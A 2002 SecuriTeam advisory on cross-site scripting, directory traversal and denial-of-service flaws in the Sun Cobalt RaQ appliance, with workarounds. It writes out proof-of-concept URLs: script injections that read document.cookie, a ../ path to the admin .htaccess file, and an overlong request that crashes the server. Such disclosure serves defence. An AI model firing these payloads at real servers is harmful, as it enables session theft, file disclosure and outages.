[UNIX] Cobalt RaQ Cross Site Scripting, Directory Traversal and DoS Vulnerabilities

From: support@securiteam.com
Date: 03/02/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  2 Mar 2002 19:16:09 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cobalt RaQ Cross Site Scripting, Directory Traversal and DoS
Vulnerabilities
------------------------------------------------------------------------

SUMMARY

The Sun Cobalt RaQ is a server appliance for Internet Service Providers
(ISPs). It can host up to 200 individual websites or it can be dedicated
to a single medium or large customer.
Multiple security vulnerabilities have been found in the product, and
though the vulnerabilities require a valid account on the Cobalt machine,
they are dangerous nonetheless.

DETAILS

Cross site scripting:
Cobalt's service.cgi incorrectly handles the incoming search parses,
incoming HTML tags or JavaScript will be included inside the result
without them being filtered out for dangerous content.

Affected CGIs:
alert.cgi
service.cgi

Workaround:
1) Delete service.cgi from the system, or disable it from execution.
2) Delete alert.cgi from the system, or disable it from execution

Example:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>Hello!</h1><script>alert('hello')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>alert('Microsoft%20hole')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=)>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>alert(document.cookie)</script>

Location:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E

Cookies:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Tag images:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=)>

Write document:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=>document.write(document.domain)</SCRIPT>

Directory traversal:
A directory traversal vulnerability exists by default in the CGI:
"/usr/admserv/html/.cobalt/admin". The CGI would allow you to access any
restricted files.

Example:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

Denial of service:
The server crashes when it receives a very long URL.

Example:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com>
Alex Hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.